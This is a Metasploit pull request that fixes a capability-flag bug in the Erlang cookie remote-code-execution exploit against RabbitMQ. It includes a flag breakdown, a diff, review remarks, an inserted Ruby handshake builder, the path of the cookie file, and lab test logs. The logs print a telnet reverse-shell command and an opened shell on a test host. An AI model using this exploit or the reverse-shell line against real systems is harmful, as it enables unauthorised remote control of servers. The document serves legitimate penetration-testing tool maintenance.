Add DFLAG_BIG_CREATION to capability flags for erlang_cookie_rce.rb #15634

Merged: 3 commits merged into rapid7:master from the patch-1 branch, Sep 7, 2021

Conversation

maikthulhu (Contributor) commented Sep 1, 2021

I have been having trouble getting this module (and other projects) to work on a specific target. I took some time to analyze the problem and it appears to be with the included capability flag set (0x3499c). In my case (and I suspect others'), the target node was rejecting the client with "not_allowed". After testing I found that simply adding DFLAG_BIG_CREATION (0x40000) allowed this exploit to work, both on the host I was having trouble with, and an older one where this (unmodified) exploit was still working. Breakdown of flags is below.

```
0x0007499c == 0b0000 0000 0111 0100 1001 1001 1100
                   |       |||  |   |  | |  | ||-- DFLAG_EXTENDED_REFERENCES
                   |       |||  |   |  | |  | |-- DFLAG_DIST_MONITOR
                   |       |||  |   |  | |  |-- DFLAG_FUN_TAGS
                   |       |||  |   |  | |-- DFLAG_NEW_FUN_TAGS
                   |       |||  |   |  |-- DFLAG_EXTENDED_PIDS_PORTS
                   |       |||  |   |-- DFLAG_NEW_FLOATS
                   |       |||  |-- DFLAG_SMALL_ATOM_TAGS
                   |       |||-- DFLAG_UTF8_ATOMS
                   |       ||-- DFLAG_MAP_TAG
                   |       |-- **DFLAG_BIG_CREATION**
                   |-- DFLAG_HANDSHAKE_23
```

This fixes the send_name procedure in this exploit for some hosts which support slightly different capability flags. The updated flags also appear to continue working against hosts where this exploit worked previously.

Verification

List the steps needed to make sure this thing works

  • Install the Erlang Port Mapper Daemon
  • Install RabbitMQ
  • Start msfconsole
  • use exploit/multi/misc/erlang_cookie_rce
  • set RHOST <ip>
  • set COOKIE <cookie>
  • set TARGET <target>
  • set LHOST <host>
  • exploit
  • Verify shell is returned

I have been having trouble with this module (and other projects) using the included set of capability flags (0x3499c) on a specific host. I took some time to analyze the problem and it appears to be with the included flag set. In my case (and I suspect others'), the target node was rejecting the client with "not_allowed". After testing I found that simply adding DFLAG_BIG_CREATION (0x40000) allowed this exploit to work, both on the host I was having trouble with, and an older one where this (unmodified) exploit was working. Breakdown of flags is below.

```
0x0007499c == 0b0000 0000 0111 0100 1001 1001 1100
                   |       |||  |   |  | |  | ||-- DFLAG_EXTENDED_REFERENCES
                   |       |||  |   |  | |  | |-- DFLAG_DIST_MONITOR
                   |       |||  |   |  | |  |-- DFLAG_FUN_TAGS
                   |       |||  |   |  | |-- DFLAG_NEW_FUN_TAGS 
                   |       |||  |   |  |-- DFLAG_EXTENDED_PIDS_PORTS 
                   |       |||  |   |-- DFLAG_NEW_FLOATS 
                   |       |||  |-- DFLAG_SMALL_ATOM_TAGS
                   |       |||-- DFLAG_UTF8_ATOMS
                   |       ||-- DFLAG_MAP_TAG 
                   |       |-- **DFLAG_BIG_CREATION**
                   |-- DFLAG_HANDSHAKE_23
```
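The description above states the fix as a single flag word (0x0003499c becoming 0x0007499c) and the handshake the module sends as hard-coded bytes. The following Ruby is an added example, not the Metasploit module's own code: it assembles the pre-OTP-23 `send_name` message from named capability flags, parses it back with the length and tag checks a receiving node performs, and reports which flags one word is missing relative to another, which is the kind of diff that turned up DFLAG_BIG_CREATION here. The flag constants are the subset of OTP's dist.hrl that the breakdown names, and the node name `rce@attacker` is a made-up sample.

```ruby
# Added example, not code from the Metasploit module: assemble the Erlang
# distribution "send_name" handshake message from named capability flags,
# parse it back, and report which flags a given word is missing.
# Constant values are the subset of OTP's dist.hrl that the PR breakdown
# names; the node name 'rce@attacker' used at the bottom is a made-up sample.
DFLAGS = {
  'DFLAG_EXTENDED_REFERENCES' => 0x4,
  'DFLAG_DIST_MONITOR'        => 0x8,
  'DFLAG_FUN_TAGS'            => 0x10,
  'DFLAG_NEW_FUN_TAGS'        => 0x80,
  'DFLAG_EXTENDED_PIDS_PORTS' => 0x100,
  'DFLAG_NEW_FLOATS'          => 0x800,
  'DFLAG_SMALL_ATOM_TAGS'     => 0x4000,
  'DFLAG_UTF8_ATOMS'          => 0x10000,
  'DFLAG_MAP_TAG'             => 0x20000,
  'DFLAG_BIG_CREATION'        => 0x40000,
  'DFLAG_HANDSHAKE_23'        => 0x1000000,
}.freeze

# Flag word the module sent before this PR, and the word after the fix.
OLD_FLAGS = 0x0003499c
NEW_FLAGS = OLD_FLAGS | DFLAGS.fetch('DFLAG_BIG_CREATION') # 0x0007499c

# OR named flags into a word; an unknown name raises instead of silently
# producing a wrong capability set.
def flags_from(*names)
  names.map { |n| DFLAGS.fetch(n) }.reduce(0, :|)
end

# Names of the known flags set in a word (bits not in DFLAGS are ignored).
def decode_flags(word)
  DFLAGS.select { |_, bit| word & bit != 0 }.keys
end

# Flags present in +required+ but absent from +sent+. A peer that answers
# "not_allowed", as in the PR, is the case where this is non-empty.
def missing_flags(sent, required)
  decode_flags(required & ~sent)
end

# Pre-OTP-23 send_name: 2-byte big-endian length, tag 'n', 2-byte version
# (5 = R6), 4-byte flags, then the node name. The length is the name length
# plus 7, as in the module, but packed as an integer rather than via a
# hex string.
def send_name(node, flags)
  body = ['n', 5, flags, node].pack('a1nNa*')
  [body.bytesize].pack('n') + body
end

# Inverse of send_name, with the framing checks a receiver performs.
def parse_send_name(msg)
  raise ArgumentError, 'short message' if msg.bytesize < 9
  len = msg.unpack1('n')
  raise ArgumentError, 'length mismatch' unless msg.bytesize == len + 2
  tag, version, flags = msg[2, 7].unpack('a1nN')
  raise ArgumentError, "unexpected tag #{tag.inspect}" unless tag == 'n'
  { version: version, flags: flags, node: msg[9, len - 7] }
end

if __FILE__ == $PROGRAM_NAME
  puts format('old 0x%08x: %s', OLD_FLAGS, decode_flags(OLD_FLAGS).join(' | '))
  puts format('new 0x%08x: %s', NEW_FLAGS, decode_flags(NEW_FLAGS).join(' | '))
  puts "missing from old word: #{missing_flags(OLD_FLAGS, NEW_FLAGS).join(', ')}"
  msg = send_name('rce@attacker', NEW_FLAGS)
  puts msg.unpack1('H*')
  p parse_send_name(msg)
end
```

Building the word with `flags_from` keeps the comment and the bytes from drifting apart, which is the defect the review below points at; `missing_flags` is the check to run when a node rejects the handshake, comparing the word the client sent against the word a working client (or the target's own `erl` node) advertises.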
@@ -141,7 +141,7 @@ def exploit
send_name << [(@our_node.length+7).to_s(16)].pack('H*') #
send_name << "\x6e" # Tag: n
send_name << "\x00\x05" # Version: R6 (5)
send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c)
send_name << "\x00\x07\x49\x9c" # Flags (0x0003499c)
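Review bot: the inline comment on the added line still reads `# Flags (0x0003499c)` while the bytes now encode 0x0007499c, so the one place a future reader will check is wrong; change it to `# Flags (0x0007499c)` and list the set, e.g. `# DFLAG_EXTENDED_REFERENCES | DFLAG_DIST_MONITOR | ... | DFLAG_BIG_CREATION`, or better, OR named constants into an integer and emit `[flags].pack('N')` so the comment cannot drift from the bytes again. On the context line `[(@our_node.length+7).to_s(16)].pack('H*')`, converting the length through a hex string yields a wrong byte whenever the value has an odd number of hex digits ('H*' pads a lone nibble on the right, so 9 becomes 0x90); packing the integer directly avoids that.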
Contributor

So the comment is out of date now. You also included a really detailed description in the PR text. Since you put effort into it, would you mind putting it all in as a comment here so we know what's going on in the future?

```
0x0007499c == 0b0000 0000 0111 0100 1001 1001 1100
                   |       |||  |   |  | |  | ||-- DFLAG_EXTENDED_REFERENCES
                   |       |||  |   |  | |  | |-- DFLAG_DIST_MONITOR
                   |       |||  |   |  | |  |-- DFLAG_FUN_TAGS
                   |       |||  |   |  | |-- DFLAG_NEW_FUN_TAGS
                   |       |||  |   |  |-- DFLAG_EXTENDED_PIDS_PORTS
                   |       |||  |   |-- DFLAG_NEW_FLOATS
                   |       |||  |-- DFLAG_SMALL_ATOM_TAGS
                   |       |||-- DFLAG_UTF8_ATOMS
                   |       ||-- DFLAG_MAP_TAG
                   |       |-- **DFLAG_BIG_CREATION**
                   |-- DFLAG_HANDSHAKE_23
```

Contributor Author

Sorry I'm not quite sure of the flow here. When you say "put it all in as a comment here", do you mean to add the notes and flags breakdown to the ruby module? I can, no problem, just want to make sure I understand what you're saying.

Contributor

Just listing out the flags that are set would be helpful. Something like DFLAG_BIG_CREATION | DFLAG_MAP_TAG etc, but it might have to be broken across lines because it'd contain so many.

Whatever you think would have been helpful for you if you had to do this again.

@smcintyre-r7 (Contributor)

Do you have any tips on setting up an environment where the server would be affected by this issue?

@maikthulhu (Contributor Author)

Do you have any tips on setting up an environment where the server would be affected by this issue?

Mostly anywhere you can get a RabbitMQ instance running. I've had success with Ubuntu 20.04 and 18.04 with native repos (apt install rabbitmq-server) and CentOS 7 and EPEL repo (yum install epel-release && yum install rabbitmq-server).

The cookie value to pass in can be found in /var/lib/rabbitmq/.erlang.cookie.

Added descriptive comment for included capability flags.
Extraneous `.`. Thanks, macOS!
@bwatters-r7 bwatters-r7 self-assigned this Sep 7, 2021
@bwatters-r7 (Contributor)

Old and Busted

msf6 exploit(multi/misc/erlang_cookie_rce) > set rhost 192.168.134.116
rhost => 192.168.134.116
msf6 exploit(multi/misc/erlang_cookie_rce) > show options

Module options (exploit/multi/misc/erlang_cookie_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COOKIE                    yes       Erlang cookie to login with
   RHOSTS   192.168.134.116  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    25672            yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
                                       ne or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix


msf6 exploit(multi/misc/erlang_cookie_rce) > set cookie ICWWZBSEUUKTNZDPZODN
cookie => ICWWZBSEUUKTNZDPZODN
msf6 exploit(multi/misc/erlang_cookie_rce) > set lhost 192.168.135.197
lhost => 192.168.135.197
msf6 exploit(multi/misc/erlang_cookie_rce) > set verbose true
verbose => true
msf6 exploit(multi/misc/erlang_cookie_rce) > run

[+] sh -c '(sleep 4216|telnet 192.168.135.197 4444|while : ; do sh && break; done 2>&1|telnet 192.168.135.197 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 192.168.135.197:4444 
[*] 192.168.134.116:25672 - Receiving server challenge
[*] 192.168.134.116:25672 - MD5 digest generated: 1daeb15874a5c93e8da06df81b2aefb3
[*] 192.168.134.116:25672 - Sending challenge reply
[+] 192.168.134.116:25672 - Authentication successful, sending payload
[*] 192.168.134.116:25672 - Exploiting...
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/erlang_cookie_rce) > 


New and Improved:

msf6 exploit(multi/misc/erlang_cookie_rce) > show options

Module options (exploit/multi/misc/erlang_cookie_rce):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   COOKIE   ICWWZBSEUUKTNDPZODN  yes       Erlang cookie to login with
   RHOSTS   192.168.134.116      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    25672                yes       The target port (TCP)
   SRVHOST  0.0.0.0              yes       The local host or network interface to listen on. This must be an address on the local m
                                           achine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080                 yes       The local port to listen on.
   SSL      false                no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                       no        The URI to use for this exploit (default is random)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix


msf6 exploit(multi/misc/erlang_cookie_rce) > set lhost 192.168.135.197
lhost => 192.168.135.197
msf6 exploit(multi/misc/erlang_cookie_rce) > set cookie ICWWZBSEUUKTNZDPZODN
cookie => ICWWZBSEUUKTNZDPZODN
msf6 exploit(multi/misc/erlang_cookie_rce) > run

[+] sh -c '(sleep 3785|telnet 192.168.135.197 4444|while : ; do sh && break; done 2>&1|telnet 192.168.135.197 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 192.168.135.197:4444 
[*] 192.168.134.116:25672 - Receiving server challenge
[*] 192.168.134.116:25672 - MD5 digest generated: d263e485159c9a63451ea8fbc594c761
[*] 192.168.134.116:25672 - Sending challenge reply
[+] 192.168.134.116:25672 - Authentication successful, sending payload
[*] 192.168.134.116:25672 - Exploiting...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ShKfgn8YSC49P34R;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ShKfgn8YSC49P34R\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.135.197:4444 -> 192.168.134.116:53442) at 2021-09-07 12:54:40 -0500

ifconfig
ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.134.116  netmask 255.255.255.0  broadcast 192.168.134.255
        inet6 fd34:fe56:7891:2f3b:9dc7:66e8:9444:2f29  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::f425:4833:dc67:4f8d  prefixlen 64  scopeid 0x20<link>
        inet6 fd34:fe56:7891:2f3b:8766:7337:d434:4428  prefixlen 64  scopeid 0x0<global>
        ether 00:0c:29:1d:bb:62  txqueuelen 1000  (Ethernet)
        RX packets 597809  bytes 902522594 (902.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 505728  bytes 46087548 (46.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 560  bytes 42291 (42.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 560  bytes 42291 (42.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

uname -a
Linux ubuntu-18041 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
id
uid=123(rabbitmq) gid=128(rabbitmq) groups=128(rabbitmq)

@bwatters-r7 bwatters-r7 added the rn-fix release notes fix label Sep 7, 2021
@bwatters-r7 bwatters-r7 merged commit cfc3930 into rapid7:master Sep 7, 2021
@bwatters-r7 (Contributor)

Release Notes

This PR fixes an issue in exploit/multi/misc/erlang_cookie_rce where a missing bitwise flag caused the exploit to fail in some circumstances.

@maikthulhu maikthulhu deleted the patch-1 branch September 7, 2021 19:08